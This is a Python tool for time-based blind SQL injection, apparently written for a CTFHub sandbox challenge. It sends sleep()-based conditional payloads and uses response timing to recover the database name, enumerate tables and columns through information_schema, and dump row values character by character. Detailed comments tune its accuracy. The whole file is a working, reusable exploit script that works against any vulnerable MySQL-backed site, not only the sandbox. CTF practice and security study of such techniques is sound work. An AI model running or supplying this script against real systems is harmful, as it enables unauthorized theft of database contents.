时间盲注脚本 (time-based blind SQL injection script)
import string
import time
from urllib.parse import quote

import requests
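# Tunables for the timing oracle.  DELAY is the argument to the injected
# sleep(); a response taking at least THRESHOLD seconds counts as "true".
# Keep THRESHOLD below DELAY so jitter does not flip true -> false, but well
# above the target's normal latency so it does not flip false -> true.
# Measure the baseline round-trip first and raise both on a slow target.
# NOTE(review): if the injected expression is evaluated per row (typical for
# `where id=<payload>`), the observed delay is DELAY times the row count.
DELAY = 3
THRESHOLD = 2
# Hard cap on one HTTP request; far above DELAY so a genuine sleep() is never
# mistaken for a hang.  A Timeout propagates instead of being guessed.
TIMEOUT = DELAY * 3

# Candidate characters, most likely first so each position needs fewer
# requests.  Identifiers are matched against a narrower set than row data;
# the old letters-only set could never recover `flag_1` or `user_id`.
_IDENT_CHARS = string.ascii_lowercase + string.digits + "_" + string.ascii_uppercase
_DATA_CHARS = (
    string.ascii_lowercase + string.digits + string.ascii_uppercase
    + string.punctuation + " "
)


def _sql_str(value):
    """Render `value` as a double-quoted MySQL string literal.

    Backslash and double quote are escaped so a name containing `"` cannot
    terminate the literal.  (Not valid under sql_mode NO_BACKSLASH_ESCAPES.)
    """
    return '"%s"' % value.replace("\\", "\\\\").replace('"', '\\"')


def _sql_ident(name):
    """Render `name` as a backtick-quoted MySQL identifier (backticks doubled)."""
    return "`%s`" % name.replace("`", "``")


def _time_oracle(url, condition):
    """Return True if the SQL boolean `condition` holds on the target.

    The condition is wrapped in `if(<cond>,sleep(DELAY),1)` and appended to
    `url`, which must end at the injection point (e.g. `...?id=`).  The
    payload is percent-encoded explicitly so characters such as `"`, `#`,
    `&` or `+` never reach the query-string parser unescaped.

    A positive result is re-probed once before being accepted: one slow
    response from the network looks exactly like a sleep(), and a single
    false positive corrupts every character extracted after it.

    Raises:
        requests.exceptions.RequestException: on connection errors or when
            the request exceeds TIMEOUT; neither is treated as a result.
    """
    target = url + quote("if(%s,sleep(%d),1)" % (condition, DELAY), safe="")
    for _ in range(2):
        started = time.monotonic()
        requests.get(target, timeout=TIMEOUT)
        if time.monotonic() - started < THRESHOLD:
            return False
    return True


def _extract(url, expression, max_len, charset, oracle=None):
    """Recover the string value of the scalar SQL `expression` one char at a time.

    Each position is tested with `ascii(substr((<expr>),pos,1))=<code>`.
    Comparing byte values instead of a quoted literal has two advantages
    over `substr(...)="c"`: a character like `"` or `'` cannot break the SQL
    literal, and the comparison is exact — MySQL's default case-insensitive
    collations make `="a"` also match `A`, so the letters-only loop could
    report the wrong case.

    Extraction stops at the first position where no candidate matches; that
    is how the end of the string is found (substr() past the end is "" and a
    missing row is NULL, neither of which has an ascii() in the set).  A
    character outside `charset` therefore truncates the result rather than
    silently skipping the position.

    Args:
        url: Injection URL ending at the injection point.
        expression: SQL expression yielding a single string value.
        max_len: Upper bound on the number of positions probed.
        charset: Candidate characters, tried in order.
        oracle: Optional `oracle(condition) -> bool` replacing the timing
            oracle (e.g. a boolean-based oracle, or a stub in tests).

    Returns:
        The recovered string, possibly empty.  Progress is printed as each
        character arrives so a long run is visible.
    """
    if oracle is None:
        oracle = lambda condition: _time_oracle(url, condition)
    found = []
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle("ascii(substr((%s),%d,1))=%d" % (expression, pos, ord(ch))):
                found.append(ch)
                print("".join(found))
                break
        else:
            break  # no candidate matched: end of string (or unsupported char)
    return "".join(found)


def get_database(url, *, max_len=64, oracle=None):
    """Recover the name of the current database (`database()`).

    Args:
        url: Injection URL ending at the injection point (e.g. `...?id=`).
        max_len: Maximum name length probed; MySQL identifiers are at most
            64 characters and extraction stops early at the real end anyway.
        oracle: Optional replacement for the timing oracle (see _extract).

    Returns:
        The database name; also printed as `Database: <name>`.
    """
    database = _extract(url, "database()", max_len, _IDENT_CHARS, oracle)
    print('Database:', database)
    return database


def get_table(url, database, *, max_rows=20, max_len=64, oracle=None):
    """List the tables of `database` and ask the operator to pick one.

    Rows of information_schema.tables are walked with `limit <n>,1` until an
    index returns nothing (a scalar subquery with no row is NULL), so the
    table count need not be known up front; `max_rows` is only a safety cap.

    Returns:
        Whatever is typed at the `Choose TableName:` prompt.  It is not
        checked against the list — the operator may want a table the
        charset could not fully recover.
    """
    tables = []
    for row in range(max_rows):
        expr = ("select table_name from information_schema.tables "
                "where table_schema=%s limit %d,1" % (_sql_str(database), row))
        name = _extract(url, expr, max_len, _IDENT_CHARS, oracle)
        if not name:
            break
        tables.append(name)
    print('Tables:', tables)
    return input("Choose TableName:")


def get_columns(url, tablename, database, *, max_rows=20, max_len=64, oracle=None):
    """List the columns of `database`.`tablename` and ask the operator to pick one.

    Same row-walking strategy as get_table; both names are escaped as string
    literals because `tablename` comes straight from operator input.

    Returns:
        Whatever is typed at the `Choose Columnname:` prompt.
    """
    columns = []
    for row in range(max_rows):
        expr = ("select column_name from information_schema.columns "
                "where table_name=%s and table_schema=%s limit %d,1"
                % (_sql_str(tablename), _sql_str(database), row))
        name = _extract(url, expr, max_len, _IDENT_CHARS, oracle)
        if not name:
            break
        columns.append(name)
    print('Columnsname:', columns)
    return input("Choose Columnname:")


def getdata(url, tablename, database, columns, *, row=0, max_len=256, oracle=None):
    """Dump one value of `columns` from `database`.`tablename`.

    `database` now qualifies the table (it was an unused parameter).
    `limit <row>,1` selects a single row because substr() over a subquery
    returning several rows is an error, which the oracle would report as
    "no match" for every character.  Positions start at 1: `substr(x,0,1)`
    is always "" in MySQL, so the old `range(0, 50)` wasted its first pass.

    Args:
        columns: A select expression for exactly one column, inserted as-is
            (so `concat(a,b)` works); table and database are backtick-quoted.
        row: Zero-based row to dump.
        max_len: Upper bound on the value length probed.

    Returns:
        The recovered value (also printed).
    """
    expr = "select %s from %s.%s limit %d,1" % (
        columns, _sql_ident(database), _sql_ident(tablename), row)
    data = _extract(url, expr, max_len, _DATA_CHARS, oracle)
    print(data)
    return data


if __name__ == "__main__":
    url = "http://challenge-71506a2f58c546c4.sandbox.ctfhub.com:10080/?id="
    database = get_database(url)
    tablename = get_table(url, database)
    columns = get_columns(url, tablename, database)
    getdata(url, tablename, database, columns)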